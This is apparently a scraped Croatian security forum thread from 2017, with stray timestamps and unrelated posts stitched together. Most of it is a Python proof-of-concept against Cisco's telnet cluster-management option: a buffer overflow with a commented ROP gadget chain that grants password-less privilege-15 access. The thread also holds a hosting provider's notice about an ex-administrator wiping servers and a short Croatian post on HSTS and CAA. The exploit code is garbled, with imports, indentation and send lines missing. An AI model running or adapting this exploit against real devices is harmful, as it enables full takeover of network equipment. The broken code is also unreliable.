08 lip 2017, 06:31
08 lip 2017, 06:40
# Artem Kondratenko (@artkond)
from time import sleep
set_credless = True
if len(sys.argv) < 3:
print sys.argv + ' [host] --set/--unset'
elif sys.argv == '--unset':
set_credless = False
elif sys.argv == '--set':
print sys.argv + ' [host] --set/--unset'
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
print '[+] All done'
08 lip 2017, 14:33
08 lip 2017, 15:11
09 lip 2017, 21:55
Ciljate na ocjenu "A", ali i A+ nije teško dobiti samo podesite HSTS, a za bonus bodove i DNS CAA record: https://support.dnsimple.com/articles/caa-record/https://www.ssllabs.com/ssltest/
Uzmite u obzir da SSL stavlja dodatni overhead na CPU, pa ako vam sada server rubno radi onda ćete ipak morati malo nadograditi nešto:)https://www.haproxy.com/blog/serving-ecc-and-rsa-certificates-on-same-ip-with-haproxy/
11 lip 2017, 04:21
12 lip 2017, 01:50
First of all, we want to offer our apologies for any inconvenience.
Unfortunately, an ex administrator has deleted all customer data and wiped most servers.
Because of this, we took the necessary steps to temporarily take our network offline.
We have been working hard to recover the data but this was not possible for all data that was lost.
Our network and hosting services will be back this week with security updates.
Current customers who are still interested in our services will receive compensation for their services.
If clients have important data please contact us at email@example.com.
We will try our best with our technical team to recover you data.
Our recommendation is to change all server passwords.
Status update 1: (finished) All dedicated servers located in The Netherlands should be online at 6 PM UTC.
We are still working on a solution for cloud servers.
Status update 2: (finished) All dedicated servers are online. If you are facing any problems with your dedicated server please send a e-mail to firstname.lastname@example.org.
Right now all virtual machines are uploading to a new server.
Status update 3: (finished) Most cloud nodes located in The Netherlands are online.
We are still facing small problems with some cloud nodes, we will update this page when this is resolved.
Status update 4: (finished) All nodes located in The Netherlands are online.
Our France SSD node is also online, other nodes are coming up.
Status update 5: All our Canada nodes are online now. We are still working on France.
If your server is still offline please contact us at email@example.com.
Don't forgot to include your server IP address.
After investigation, there is no data lost in The Netherlands and France SSD.
We known about the IPv6 issues in The Netherlands our NOC is working on it.
16 lip 2017, 10:40
16 lip 2017, 14:24
Osobno se pitam u koliko toga bi se moglo doći u Hrvatskoj, iz identičnog načina razmišljanja? HEP? MUP? SOA? HŽ? Vlada? Tko zna...
16 lip 2017, 22:42